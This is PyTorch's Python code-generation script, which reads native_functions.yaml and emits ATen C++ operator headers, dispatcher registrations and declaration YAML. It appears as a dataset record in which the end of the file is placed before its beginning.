action='store_true',
help='force it to generate schema-only registrations for all ops, including'
'those that are not listed on --op_registration_whitelist')
parser.add_argument(
'--generate',
type=str,
nargs='*',
choices=['headers', 'sources', 'declarations_yaml'],
default=['headers', 'sources', 'declarations_yaml'],
help='Generate only a subset of files')
options = parser.parse_args()
selector = get_custom_build_selector(
options.op_registration_whitelist,
options.op_selection_yaml_path,
)
native_yaml_path = os.path.join(options.source_path, 'native/native_functions.yaml')
parsed_yaml = parse_native_yaml(native_yaml_path)
native_functions, backend_indices = parsed_yaml.native_functions, parsed_yaml.backend_indices
grouped_native_functions = get_grouped_native_functions(native_functions)
template_dir = os.path.join(options.source_path, "templates")
# NB: It is mandatory to NOT use os.path.join here, as the install directory
# will eventually be ingested by cmake, which does not respect Windows style
# path slashes. If you switch this to use os.path.join, you'll get an error
# like:
#
# Syntax error in cmake code when parsing string
#
# C:/Jenkins/workspace/pytorch-builds/pytorch-win-ws2016-cuda9-cudnn7-py3-build/build/aten/src/ATen\core/TensorMethods.h
#
# Invalid character escape '\c'.
core_install_dir = f'{options.install_dir}/core'
pathlib.Path(core_install_dir).mkdir(parents=True, exist_ok=True)
ops_install_dir = f'{options.install_dir}/ops'
pathlib.Path(ops_install_dir).mkdir(parents=True, exist_ok=True)
def make_file_manager(install_dir: str) -> FileManager:
return FileManager(install_dir=install_dir, template_dir=template_dir, dry_run=options.dry_run)
core_fm = make_file_manager(core_install_dir)
cpu_fm = make_file_manager(options.install_dir)
cuda_fm = make_file_manager(options.install_dir)
ops_fm = make_file_manager(ops_install_dir)
extra_cuda_headers = '''\
#include <c10/cuda/CUDAGuard.h>
#include <ATen/cuda/ATenCUDAGeneral.h>
#include <ATen/cuda/CUDADevice.h>
#include <ATen/cuda/CUDAContext.h>'''
if options.rocm:
extra_cuda_headers = '''\
#include <ATen/hip/impl/HIPGuardImplMasqueradingAsCUDA.h>
#include <ATen/hip/ATenHIPGeneral.h>
#include <ATen/hip/HIPDevice.h>
#include <ATen/hip/HIPContext.h>'''
dispatch_keys = [
DispatchKey.CPU,
DispatchKey.SparseCPU,
DispatchKey.SparseCsrCPU,
DispatchKey.MkldnnCPU,
DispatchKey.CUDA,
DispatchKey.SparseCUDA,
DispatchKey.SparseCsrCUDA,
DispatchKey.QuantizedCPU,
DispatchKey.QuantizedCUDA,
DispatchKey.CompositeImplicitAutograd,
DispatchKey.CompositeExplicitAutograd,
# Meta is a magic key: it is automatically generated for structured
# kernels
DispatchKey.Meta,
DispatchKey.ZeroTensor,
]
# Only a limited set of dispatch keys get CPUFunctions.h headers generated
# for them; this is the set
functions_keys = {
DispatchKey.CPU,
DispatchKey.CUDA,
DispatchKey.CompositeImplicitAutograd,
DispatchKey.CompositeExplicitAutograd,
DispatchKey.Meta,
}
if options.backend_whitelist:
dispatch_keys = [k for k in dispatch_keys if is_generic_dispatch_key(k) or str(k) in options.backend_whitelist]
static_dispatch_idx: Optional[BackendIndex] = None
if options.static_dispatch_backend:
static_dispatch_idx = backend_indices[DispatchKey.parse(options.static_dispatch_backend)]
if 'sources' in options.generate:
gen_source_files(
native_functions=native_functions,
grouped_native_functions=grouped_native_functions,
static_dispatch_idx=static_dispatch_idx,
selector=selector,
backend_indices=backend_indices,
core_fm=core_fm,
cpu_fm=cpu_fm,
cuda_fm=cuda_fm,
dispatch_keys=dispatch_keys,
functions_keys=functions_keys,
rocm=options.rocm,
force_schema_registration=options.force_schema_registration,
per_operator_headers=options.per_operator_headers,
)
if 'headers' in options.generate:
gen_headers(
native_functions=native_functions,
grouped_native_functions=grouped_native_functions,
static_dispatch_idx=static_dispatch_idx,
selector=selector,
backend_indices=backend_indices,
core_fm=core_fm,
cpu_fm=cpu_fm,
cuda_fm=cuda_fm,
ops_fm=ops_fm,
dispatch_keys=dispatch_keys,
functions_keys=functions_keys,
rocm=options.rocm,
per_operator_headers=options.per_operator_headers,
)
if 'declarations_yaml' in options.generate:
gen_declarations_yaml(
native_functions=native_functions,
cpu_fm=cpu_fm)
if options.output_dependencies:
depfile_path = pathlib.Path(options.output_dependencies).resolve()
depfile_name = depfile_path.name
depfile_stem = depfile_path.stem
for fm, prefix in [
(cpu_fm, ""),
(core_fm, "core_"),
(cuda_fm, "cuda_"),
(ops_fm, "ops_"),
]:
varname = prefix + depfile_stem
path = depfile_path.parent / (prefix + depfile_name)
fm.write_outputs(varname, str(path))
if __name__ == '__main__':
main()
| 43.305572 | 128 | 0.643291 | import os
from typing import List, Dict, Optional, Tuple, Set, Any, Union, Sequence, TypeVar
from typing_extensions import Literal
import yaml
from collections import OrderedDict, defaultdict, namedtuple
import argparse
import pathlib
import json
from dataclasses import dataclass
from tools.codegen.model import (Argument, DispatchKey, FunctionSchema,
Location, NativeFunction,
NativeFunctionsGroup, OperatorName,
BackendIndex, BackendMetadata,
OptionalType, SchemaKind, SelfArgument,
TensorOptionsArguments, Type, Variant,
is_cuda_dispatch_key,
is_generic_dispatch_key,
Tag, BaseOperatorName)
from tools.codegen.api.types import (Binding, CppSignature, CppSignatureGroup,
DispatcherSignature, NativeSignature)
from tools.codegen.api import cpp
import tools.codegen.api.dispatcher as dispatcher
import tools.codegen.api.native as native
import tools.codegen.api.meta as meta
import tools.codegen.api.structured as structured
from tools.codegen.api.translate import translate
from tools.codegen.selective_build.selector import SelectiveBuilder
from tools.codegen.utils import (
Target, concatMap, context, mapMaybe, YamlDumper, YamlLoader, FileManager, assert_never
)
from tools.codegen.context import (method_with_native_function,
native_function_manager,
with_native_function_and_indices,
with_native_function)
import tools.codegen.dest as dest
from tools.codegen.gen_functionalization_type import (
needs_functionalization,
gen_functionalization_definition,
gen_functionalization_registration,
gen_functionalization_view_inverse_declaration
)
T = TypeVar('T')
class LineLoader(YamlLoader):
def construct_mapping(self, node, deep=False):
mapping = super().construct_mapping(node, deep=deep)
mapping['__line__'] = node.start_mark.line + 1
return mapping
_GLOBAL_PARSE_NATIVE_YAML_CACHE = {}
ParsedYaml = namedtuple('ParsedYaml', ['native_functions', 'backend_indices'])
def parse_native_yaml(path: str) -> ParsedYaml:
global _GLOBAL_PARSE_NATIVE_YAML_CACHE
if path not in _GLOBAL_PARSE_NATIVE_YAML_CACHE:
with open(path, 'r') as f:
es = yaml.load(f, Loader=LineLoader)
assert isinstance(es, list)
rs: List[NativeFunction] = []
bs: Dict[DispatchKey, Dict[OperatorName, BackendMetadata]] = defaultdict(dict)
for e in es:
assert isinstance(e.get('__line__'), int), e
loc = Location(path, e['__line__'])
funcs = e.get('func')
with context(lambda: f'in {loc}:\n {funcs}'):
func, m = NativeFunction.from_yaml(e, loc)
rs.append(func)
BackendIndex.grow_index(bs, m)
error_check_native_functions(rs)
indices: Dict[DispatchKey, BackendIndex] = defaultdict(lambda: BackendIndex(
dispatch_key=DispatchKey.Undefined,
use_out_as_primary=True,
external=False,
device_guard=False,
index={}))
for k, v in bs.items():
indices[k] = BackendIndex(
dispatch_key=k,
use_out_as_primary=True,
external=False,
device_guard=is_cuda_dispatch_key(k),
index=v)
_GLOBAL_PARSE_NATIVE_YAML_CACHE[path] = ParsedYaml(rs, indices)
return _GLOBAL_PARSE_NATIVE_YAML_CACHE[path]
def error_check_native_functions(funcs: Sequence[NativeFunction]) -> None:
func_map: Dict[OperatorName, NativeFunction] = {}
base_func_map: Dict[BaseOperatorName, List[NativeFunction]] = defaultdict(list)
for f in funcs:
func_map[f.func.name] = f
base_func_map[f.func.name.name].append(f)
for f in funcs:
if f.structured_delegate is not None:
delegate_func = func_map[f.structured_delegate]
assert delegate_func.structured, \
f"{f.func.name} is marked as a structured_delegate pointing to " \
f"{f.structured_delegate}, but {f.structured_delegate} is not marked as structured. " \
f"Consider adding 'structured=True' to the delegated operator"
if f.tag is not None and f.tag is Tag.inplace_view:
base_name = f.func.name.name
overload_name = f.func.name.overload_name
assert base_name.inplace, \
f"{f.func.name} is marked with tag: inplace_view, but it doesn't follow the naming " \
"convention for inplace ops - the codegen expects the base name to have a trailing underscore. "
out_of_place_base_name = BaseOperatorName(base_name.base, False, base_name.dunder_method)
assert len(base_func_map[out_of_place_base_name]) > 0, \
f"{f.func.name} is marked with tag: inplace_view. The codegen expects there to be a corresponding " \
f"out-of-place view op with the name '{base_name}' and matching schema, but it didn't find one. "
def cpp_string(s: str) -> str:
s = s.replace('\\', '\\\\')
s = s.replace('"', '\\"')
s = s.replace('\a', '\\a')
s = s.replace('\b', '\\b')
s = s.replace('\f', '\\f')
s = s.replace('\n', '\\n')
s = s.replace('\v', '\\v')
s = s.replace('\t', '\\t')
return f'"{s}"'
def static_dispatch_keys(backend: Optional[BackendIndex]) -> List[DispatchKey]:
if backend is None:
return []
else:
return [
backend.dispatch_key,
DispatchKey.CompositeImplicitAutograd,
DispatchKey.CompositeExplicitAutograd
]
def get_static_dispatch_backend(f: NativeFunction, backend_index: BackendIndex) -> Optional[DispatchKey]:
if (f.structured_delegate is not None or backend_index.has_kernel(f)):
return backend_index.dispatch_key
elif f.has_composite_explicit_autograd_kernel:
return DispatchKey.CompositeExplicitAutograd
elif f.has_composite_implicit_autograd_kernel:
return DispatchKey.CompositeImplicitAutograd
return None
def static_dispatch_ops_header(
f: NativeFunction,
backend_index: Optional[BackendIndex]) -> Optional[str]:
if backend_index is None or f.manual_kernel_registration:
return None
dispatch_key = get_static_dispatch_backend(f, backend_index)
return (f'#include <ATen/ops/{f.root_name}_{dispatch_key.lower()}_dispatch.h>'
if dispatch_key is not None else None)
def static_dispatch_extra_headers(backend: Optional[BackendIndex], skip_tensor_include: bool = False) -> List[str]:
if skip_tensor_include:
maybe_inl = '_inl'
else:
maybe_inl = ''
return [f'#include <ATen/{dispatch_key}Functions{maybe_inl}.h>'
for dispatch_key in static_dispatch_keys(backend)]
def static_dispatch(
f: NativeFunction, cpp_sig: CppSignature,
*, method: bool, backend_index: Optional[BackendIndex]
) -> Optional[str]:
if backend_index is None or f.manual_kernel_registration:
return None
target_sig = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=False).signature
name = target_sig.name()
exprs = translate(cpp_sig.arguments(), target_sig.arguments(), method=method)
exprs_str = ', '.join(a.expr for a in exprs)
dispatch_key = get_static_dispatch_backend(f, backend_index)
if dispatch_key is not None:
return f'return at::{dispatch_key.lower()}::{name}({exprs_str});'
return f'TORCH_CHECK(false, "Static dispatch does not support {name} for {backend_index.dispatch_key}.");'
@dataclass(frozen=True)
class RegisterSchema:
selector: SelectiveBuilder
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
if not self.selector.is_native_function_selected(f):
return None
return f'm.def({cpp_string(str(f.func))});\n'
@dataclass(frozen=True)
class ComputeOperators:
target: Union[
Literal[Target.DECLARATION],
Literal[Target.DEFINITION]
]
@method_with_native_function
def __call__(self, f: NativeFunction) -> str:
sig = DispatcherSignature.from_schema(f.func)
name = f.func.name.unambiguous_name()
call_method_name = 'call'
redispatch_method_name = 'redispatch'
if self.target is Target.DECLARATION:
# Note [The ATen Operators API]
# The ATen Operators API lives in the at::_ops namespace, and contains compile-time
# metadata about each operator + entry points into the Dispatcher.
# The C++ function, method, and redispatch API's are all implemented as wrappers
# defined here, i.e. at::_ops::is_complex::call() and at::_ops::add_out::call().
# This means that ATEN_OP(is_complex) will not fastpath, and will go through the dispatcher.
return f"""
struct TORCH_API {name} {{
using schema = {sig.type()};
using ptr_schema = schema*;
// See Note [static constexpr char* members for windows NVCC]
STATIC_CONSTEXPR_STR_INL_EXCEPT_WIN_CUDA(name, "aten::{f.func.name.name}")
STATIC_CONSTEXPR_STR_INL_EXCEPT_WIN_CUDA(overload_name, "{f.func.name.overload_name}")
STATIC_CONSTEXPR_STR_INL_EXCEPT_WIN_CUDA(schema_str, {cpp_string(str(f.func))})
static {sig.defn(name=call_method_name, is_redispatching_fn=False)};
static {sig.defn(name=redispatch_method_name, is_redispatching_fn=True)};
}};"""
elif self.target is Target.DEFINITION:
defns = f"""
STATIC_CONST_STR_OUT_OF_LINE_FOR_WIN_CUDA({name}, name, "aten::{f.func.name.name}")
STATIC_CONST_STR_OUT_OF_LINE_FOR_WIN_CUDA({name}, overload_name, "{f.func.name.overload_name}")
STATIC_CONST_STR_OUT_OF_LINE_FOR_WIN_CUDA({name}, schema_str, {cpp_string(str(f.func))})
// aten::{f.func}
static C10_NOINLINE c10::TypedOperatorHandle<{name}::schema> create_{name}_typed_handle() {{
return c10::Dispatcher::singleton()
.findSchemaOrThrow({name}::name, {name}::overload_name)
.typed<{name}::schema>();
}}
"""
for is_redispatching_fn in [False, True]:
if is_redispatching_fn:
dispatcher_exprs_str = ', '.join(['dispatchKeySet'] + [a.name for a in sig.arguments()])
dispatcher_call = 'redispatch'
method_name = f'{name}::{redispatch_method_name}'
else:
dispatcher_exprs_str = ', '.join([a.name for a in sig.arguments()])
dispatcher_call = 'call'
method_name = f'{name}::{call_method_name}'
defns += f"""
// aten::{f.func}
{sig.defn(name=method_name, is_redispatching_fn=is_redispatching_fn)} {{
static auto op = create_{name}_typed_handle();
return op.{dispatcher_call}({dispatcher_exprs_str});
}}
"""
return defns
else:
assert_never(self.target)
# Generates Function.h, which provides the functional public C++ API,
# and the scaffolding to call into the dispatcher from these functions.
@dataclass(frozen=True)
class ComputeFunction:
static_dispatch_backend_index: Optional[BackendIndex]
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
if Variant.function not in f.variants:
return None
sig_group = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=f.manual_cpp_binding)
def generate_defn(faithful: bool) -> str:
if faithful:
sig = sig_group.faithful_signature
assert sig is not None
else:
sig = sig_group.signature
# See Note [The ATen Operators API]
target_sig = DispatcherSignature.from_schema(f.func)
exprs = translate(sig.arguments(), target_sig.arguments())
exprs_str = ', '.join([e.expr for e in exprs])
static_dispatch_block = static_dispatch(f, sig, method=False, backend_index=self.static_dispatch_backend_index)
if static_dispatch_block is None:
return f"""
// aten::{f.func}
TORCH_API inline {sig.decl()} {{
return at::_ops::{f.func.name.unambiguous_name()}::call({exprs_str});
}}
"""
else:
return f"""
// aten::{f.func}
TORCH_API inline {sig.decl()} {{
{static_dispatch_block}
}}
"""
result = generate_defn(False)
if sig_group.faithful_signature is not None:
result += generate_defn(True)
return result
# Generates TensorBody.h. This file provides the object-oriented (method-based)
# public C++ API, and the scaffolding to call into the dispatcher from these functions.
@dataclass(frozen=True)
class ComputeTensorMethod:
target: Union[
Literal[Target.DECLARATION],
Literal[Target.DEFINITION]
]
static_dispatch_backend_index: Optional[BackendIndex]
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
if Variant.method not in f.variants:
return None
assert not f.func.is_out_fn()
assert f.func.arguments.self_arg is not None
sig_group = CppSignatureGroup.from_native_function(f, method=True, fallback_binding=f.manual_cpp_binding)
if self.target is Target.DECLARATION:
result = f"{sig_group.signature.decl()} const;\n"
if sig_group.faithful_signature is not None:
result += f"{sig_group.faithful_signature.decl()} const;\n"
return result
if self.target is not Target.DEFINITION:
assert_never(self.target)
def generate_defn(faithful: bool) -> str:
if faithful:
sig = sig_group.faithful_signature
assert sig is not None
else:
sig = sig_group.signature
target_sig = DispatcherSignature.from_schema(f.func)
exprs = translate(sig.arguments(), target_sig.arguments(), method=True)
exprs_str = ', '.join([e.expr for e in exprs])
static_dispatch_block = static_dispatch(f, sig, method=True, backend_index=self.static_dispatch_backend_index)
if static_dispatch_block is None:
return f"""
// aten::{f.func}
inline {sig.defn(prefix="Tensor::")} const {{
return at::_ops::{f.func.name.unambiguous_name()}::call({exprs_str});
}}
"""
else:
return f"""
// aten::{f.func}
inline {sig.defn(prefix="Tensor::")} const {{
{static_dispatch_block}
}}
"""
result = generate_defn(faithful=False)
if sig_group.faithful_signature is not None:
result += generate_defn(faithful=True)
return result
# Generates RedispatchFunctions.h.
# This is similar to the C++ API defined in Functions.h, but provides access
# to the dispatcher's redispatch API.
@dataclass(frozen=True)
class ComputeRedispatchFunction:
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
sig_group = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=f.manual_cpp_binding)
def generate_defn(faithful: bool) -> str:
if faithful:
sig = sig_group.faithful_signature
assert sig is not None
else:
sig = sig_group.signature
target_sig = DispatcherSignature.from_schema(f.func)
exprs = translate(sig.arguments(), target_sig.arguments())
exprs_str = ', '.join(['dispatchKeySet'] + [a.expr for a in exprs])
return f"""
// aten::{f.func}
TORCH_API inline {sig.decl(is_redispatching_fn=True)} {{
return at::_ops::{f.func.name.unambiguous_name()}::redispatch({exprs_str});
}}
"""
result = generate_defn(False)
if sig_group.faithful_signature is not None:
result += generate_defn(True)
return result
# one way or another, we should reevaluate if this is actually needed.
@with_native_function
def compute_aten_op(f: NativeFunction) -> str:
return f'{{"aten::{f.func.name.name}", "{f.func.name.overload_name}"}},'
# Generates MetaFunctions.h
def compute_meta_function_declaration(g: NativeFunctionsGroup) -> Optional[str]:
if not g.structured:
return None
with native_function_manager(g.out):
name = meta.name(g)
args = structured.meta_arguments(g)
args_str = ', '.join(a.decl() for a in args)
parent_class = g.out.structured_inherits
if parent_class is None:
parent_class = "at::impl::MetaBase"
meta_return = "void"
precomputed = g.out.precomputed if g.structured else None
if precomputed:
# Generate the template declaration with one bool parameter for each
# precomputed element. Each parameter is true if the corresponding (in
# terms of position) precomputed element has been set.
precomputed_values = [*precomputed.replace.values(), precomputed.add]
precomputed_elements = [elem for replace_list in precomputed_values for elem in replace_list]
precomputed_template_parameters = [elem.name.upper() for elem in precomputed_elements]
precomputed_template_params_str = ", ".join(f"bool {param} = false" for param in precomputed_template_parameters)
precompute_template_decl = f"template <{precomputed_template_params_str}>"
# Generate a string containing declarations of all precomputed elements.
precomputed_elements_with_cpp_types = [
structured.argument_type(elem, binds=elem.name)
for elem in precomputed_elements
]
precomputed_elements_decl = ";\n".join(
f"{elem.cpp_type(strip_ref=True)} {elem.name}" for elem in precomputed_elements_with_cpp_types
)
# Generate "setter" methods for each precomputed element. Each method will return
# a new instance of precompute_out with the template parameter that corresponds to
# the member set by the method to true (to indicate that it has been set).
setter_methods = []
for i, elem in enumerate(precomputed_elements):
# Generate the signature. The return type will be the same
# as the type of `this` but with the template parameter
# corresponding to the element set by this method set to true.
# The assert generated below will ensure that this template
# parameter is false on the type of `this`.
return_ty_templates = ", ".join(
precomputed_template_parameters[:i] + ["true"] + precomputed_template_parameters[i + 1:]
)
return_ty = f"precompute_out<{return_ty_templates}>"
elem_cpp_ty = precomputed_elements_with_cpp_types[i].cpp_type(strip_ref=True)
signature = f"{return_ty} set_{elem.name}({elem_cpp_ty} value)"
# Generate an assert which checks that the
# template parameter corresponding to the precomputed
# element that is set by this method is false on the
# class corresponding to the object that `this` points to.
# This ensures that each element can be set only once.
assert_msg = f"\"{precomputed_elements[i].name} already set\""
assert_stmt = f"static_assert({precomputed_template_parameters[i]} == false, {assert_msg});"
# Generate the new object construction block. All state
# except the element that this method sets is copied from the
# object that `this` points to. The value for the element that
# the method sets is taken from a method parameter.
construction_stmts = []
construction_stmts.append(f"{return_ty} ret;")
for j, elem in enumerate(precomputed_elements):
if i == j:
construction_stmts.append(f"ret.{elem.name} = value;")
else:
construction_stmts.append(f"ret.{elem.name} = this->{elem.name};")
construction_stmts.append("return ret;")
construction_block = "\n".join(construction_stmts)
setter_methods.append(f"""
{signature} {{
{assert_stmt}
{construction_block}
}}
""")
setter_methods_decl = "\n".join(setter_methods)
# Meta should return an instance of the struct containing the precomputed elements.
meta_return_template_params = ", ".join(["true"] * len(precomputed_template_parameters))
# This typedef (actually a using statement) is needed so that TORCH_META_FUNC can reuse the return
# type (which has a variable number of template parameters).
meta_return_typedef = f"using meta_return_ty = precompute_out <{meta_return_template_params}>;"
meta_return = "meta_return_ty"
precomputed_decl = f"""
{precompute_template_decl}
struct TORCH_API precompute_out {{
{setter_methods_decl}
{precomputed_elements_decl};
}};"""
else:
meta_return_typedef = ""
precomputed_decl = ""
return f"""\
struct TORCH_API structured_{name} : public {parent_class} {{
{precomputed_decl}
{meta_return_typedef}
{meta_return} meta({args_str});
}};
"""
def needs_backend_select(f: NativeFunction, selector: SelectiveBuilder) -> bool:
name = str(f.func.name.name)
if name.endswith('_like') or name.startswith('new_'):
return False
if f.func.arguments.tensor_options is None:
return False
return selector.is_native_function_selected(f)
# Generates RegisterBackendSelect.cpp, a series of kernels which provide
# specialized computation of dispatch key for operator signatures which cannot
# be easily done automatically using templating.
@dataclass(frozen=True)
class ComputeBackendSelect:
target: Union[
Literal[Target.DEFINITION],
Literal[Target.REGISTRATION]
]
# Selector object to determine which operators to generate
# registration code for.
selector: SelectiveBuilder
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
if not needs_backend_select(f, self.selector):
return None
name = native.name(f.func)
native_sig = NativeSignature(f.func)
native_tensor_args = [
a for a in native_sig.arguments()
if isinstance(a.argument, Argument) and a.argument.type.is_tensor_like()
]
dispatcher_sig = DispatcherSignature.from_schema(f.func)
sig: Union[NativeSignature, DispatcherSignature]
sig = dispatcher_sig
dispatcher_exprs = dispatcher_sig.exprs()
dispatch_key = "c10::computeDispatchKey(dtype, layout, device)"
if self.target is Target.DEFINITION:
# I don't think there's actually a good reason to generate
# these two cases differently
# The first case could probably be improved though- it calls computeDispatchKeySet(),
# which looks at TLS dispatch keys- there should not be any by the time we reach backend select.
if native_tensor_args:
tensor_args = ', '.join(a.name for a in native_tensor_args)
compute_dk = f"""\
DispatchKeySet _dk_set = c10::DispatchKeySet({dispatch_key}) | c10::detail::multi_dispatch_key_set({tensor_args});
DispatchKeySet _dk_mask = c10::DispatchKeySet(DispatchKeySet::FULL_AFTER, DispatchKey::BackendSelect);
DispatchKeySet _dk = c10::impl::computeDispatchKeySet(_dk_set, _dk_mask);"""
else:
compute_dk = f"DispatchKeySet _dk = c10::DispatchKeySet({dispatch_key});"
return f"""\
// aten::{f.func}
C10_ALWAYS_INLINE
{sig.defn(name)} {{
{compute_dk}
return at::_ops::{f.func.name.unambiguous_name()}::redispatch(
_dk, {', '.join(a.expr for a in dispatcher_exprs)});
}}
"""
elif self.target is Target.REGISTRATION:
return f"""m.impl("aten::{f.func.name}", TORCH_FN({name}));"""
else:
assert_never(self.target)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
#
# YAML CODE GENERATION
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def format_yaml(data: object) -> str:
# Ignore alias in Dumper
YamlDumper.ignore_aliases = lambda self, data: True # type: ignore[assignment]
# Support serializing OrderedDict
def dict_representer(dumper: Any, data: Any) -> Any:
return dumper.represent_dict(data.items())
YamlDumper.add_representer(OrderedDict, dict_representer) # type: ignore[no-untyped-call]
# Some yaml parsers (e.g. Haskell's) don't understand line breaks.
# width=1e9 turns off optional line breaks and improves
# the portability of the outputted yaml.
return yaml.dump(data, default_flow_style=False, Dumper=YamlDumper, width=1e9) # type: ignore[no-any-return]
# For some reason, some defaults we write to YAML are written as native
# YAML objects, rather than doing them uniformly as strings. This
# function detects those cases and converts them into native Python
# objects.
def pythonify_default(s: str) -> object:
if s == 'true':
return True
elif s == 'false':
return False
try:
return int(s)
except ValueError:
try:
return float(s)
except ValueError:
return s
# What is a dynamic type? Over time, the semantic meaning of
# dynamic type has degraded to meaninglessness (in the old days,
# it captured dtype-ness of types, but that has gone away with
# the removal of TH). These days, it's mostly the same thing as
def dynamic_type(t: Type) -> str:
if isinstance(t, OptionalType):
return dynamic_type(t.elem)
# also include Tensor[]
if str(t) == 'Tensor':
return 'at::Tensor'
return cpp.argumenttype_type(t, mutable=False, binds='__placeholder__').cpp_type()
def compute_method_of_yaml(variants: Set[Variant]) -> List[str]:
# This is written out explicitly to ensure that Tensor and
# namespace are put into the list in the right order
method_of = ['Type']
if Variant.method in variants:
method_of.append('Tensor')
if Variant.function in variants:
method_of.append('namespace')
return method_of
def compute_returns_yaml(f: NativeFunction) -> Tuple[List[Dict[str, str]], Dict[str, str]]:
# Note [name and field_name]
# ~~~~~~~~~~~~~~~~~~~~~~~~~~
# To understand name_to_field_name, we must first talk about this
# schema:
#
# lstsq.X(Tensor self, Tensor A, *, Tensor(a!) X, Tensor(b!) qr) -> (Tensor(a!) solution, Tensor(b!) QR)
#
# There is something very odd about this schema: it is an out
# variant of the function (that is to say, it will convert into
# at::lstsq_out() in the C++ API), but the names of the output
# return arguments don't match the keyword argument names of
# directly maintain this correspondence in the modeling of function
# schema itself.
#
# See also https://github.com/pytorch/pytorch/issues/43114
name_to_field_name: Dict[str, str] = {}
# Compute the returns field of the YAML entry
names = cpp.return_names(f)
returns = []
for i, (r, name) in enumerate(zip(f.func.returns, names)):
ret = {
'dynamic_type': dynamic_type(r.type),
'name': name,
'type': cpp.return_type(r).cpp_type(),
}
if r.name:
# See Note [name and field_name]
ret['field_name'] = r.name
if f.func.is_out_fn():
name_to_field_name[f.func.arguments.out[i].name] = r.name
returns.append(ret)
return returns, name_to_field_name
# arguments in yaml roughly corresponds to the public C++ API
def compute_cpp_argument_yaml(cpp_a: Binding, *, schema_order: bool, kwarg_only_set: Set[str],
out_arg_set: Set[str], name_to_field_name: Dict[str, str]) -> object:
if isinstance(cpp_a.argument, TensorOptionsArguments):
arg: Dict[str, object] = {
'annotation': None,
'dynamic_type': 'at::TensorOptions',
'is_nullable': False,
'name': cpp_a.name,
'type': cpp_a.type,
'kwarg_only': True,
}
if cpp_a.default is not None:
arg['default'] = cpp_a.default
return arg
elif isinstance(cpp_a.argument, SelfArgument):
raise AssertionError()
elif isinstance(cpp_a.argument, Argument):
return compute_argument_yaml(
cpp_a.argument, schema_order=schema_order,
kwarg_only_set=kwarg_only_set, out_arg_set=out_arg_set, name_to_field_name=name_to_field_name)
def compute_argument_yaml(a: Argument, *, schema_order: bool, kwarg_only_set: Set[str],
out_arg_set: Set[str], name_to_field_name: Dict[str, str]) -> object:
arg: Dict[str, object] = {
'annotation': str(a.annotation) if a.annotation else None,
'dynamic_type': dynamic_type(a.type),
'is_nullable': a.type.is_nullable(),
'name': a.name,
'type': cpp.argument_type(a, binds="__placeholder__").cpp_type(),
}
if a.default is not None:
arg['default'] = pythonify_default(cpp.default_expr(a.default, a.type))
if a.name in kwarg_only_set:
arg['kwarg_only'] = True
if a.name in out_arg_set:
arg['output'] = True
arg['allocate'] = True
# See Note [name and field_name]
if a.name in name_to_field_name:
arg['field_name'] = name_to_field_name[a.name]
# Historically, booleans don't get their size recorded, because it
l = a.type.is_list_like()
if l is not None and l.size is not None and str(l.elem) != 'bool':
arg['size'] = l.size
return arg
@with_native_function
def compute_declaration_yaml(f: NativeFunction) -> object:
returns, name_to_field_name = compute_returns_yaml(f)
kwarg_only_set = set(a.name for a in f.func.arguments.flat_kwarg_only)
out_arg_set = set(a.name for a in f.func.arguments.out)
sig_group = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=False)
cpp_args = sig_group.signature.arguments()
arguments = [
compute_cpp_argument_yaml(
cpp_a, schema_order=False,
kwarg_only_set=kwarg_only_set, out_arg_set=out_arg_set, name_to_field_name=name_to_field_name)
for cpp_a in cpp_args
]
schema_order_jit_arguments = list(f.func.schema_order_arguments())
schema_order_arguments = [
compute_argument_yaml(
a, schema_order=True,
kwarg_only_set=kwarg_only_set, out_arg_set=out_arg_set, name_to_field_name=name_to_field_name)
for a in schema_order_jit_arguments
]
cpp_schema_order_types = [
r.type for a in schema_order_jit_arguments
for r in cpp.argument(
a, method=False, cpp_no_default_args=set(), faithful=False, has_tensor_options=False)
]
cpp_returns = cpp.returns_type(f.func.returns).cpp_type()
schema_order_cpp_signature = f"{cpp_returns} ({', '.join(cpp_schema_order_types)})"
is_factory_method = any(isinstance(a.argument, TensorOptionsArguments) for a in cpp_args) \
and Variant.method not in f.variants
return OrderedDict([
('name', cpp.name(f.func)),
('operator_name', str(f.func.name.name)),
('overload_name', str(f.func.name.overload_name)),
('manual_kernel_registration', f.manual_kernel_registration),
('category_override', f.category_override if f.category_override is not None else ''),
('schema_string', f'aten::{f.func}'),
('arguments', arguments),
('schema_order_cpp_signature', schema_order_cpp_signature),
('schema_order_arguments', schema_order_arguments),
('method_of', compute_method_of_yaml(f.variants)),
('mode', 'native'),
('python_module', '' if f.python_module is None else f.python_module),
('returns', returns),
('inplace', f.func.name.name.inplace),
('is_factory_method', is_factory_method),
('abstract', f.is_abstract),
('device_guard', f.device_guard),
('with_gil', False),
('deprecated', False),
('has_math_kernel', f.has_composite_implicit_autograd_kernel),
])
# See Note [Auto generated composite kernels]
def has_autogenerated_composite_kernel(f: NativeFunction) -> bool:
return (f.structured or f.structured_delegate is not None) and \
(f.func.kind() == SchemaKind.functional or f.func.kind() == SchemaKind.inplace)
@with_native_function_and_indices
def compute_registration_declarations(f: NativeFunction, backend_indices: Dict[DispatchKey, BackendIndex]) -> str:
name = dispatcher.name(f.func)
returns_type = dispatcher.returns_type(f.func.returns).cpp_type_registration_declarations()
args = dispatcher.arguments(f.func)
args_str = ', '.join(a.no_default().decl_registration_declarations() for a in args)
comment_data : Dict[str, str] = {
'schema': f'aten::{f.func}',
# TODO: What exactly is the semantics of the 'dispatch' field?
'dispatch': str({k for k, v in backend_indices.items() if v.has_kernel(f)} != {DispatchKey.CompositeImplicitAutograd}),
'default': str(f.has_composite_kernel or has_autogenerated_composite_kernel(f))
}
return f"""{returns_type} {name}({args_str}); // {json.dumps(comment_data)}
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
#
# RUN IT ALL
#
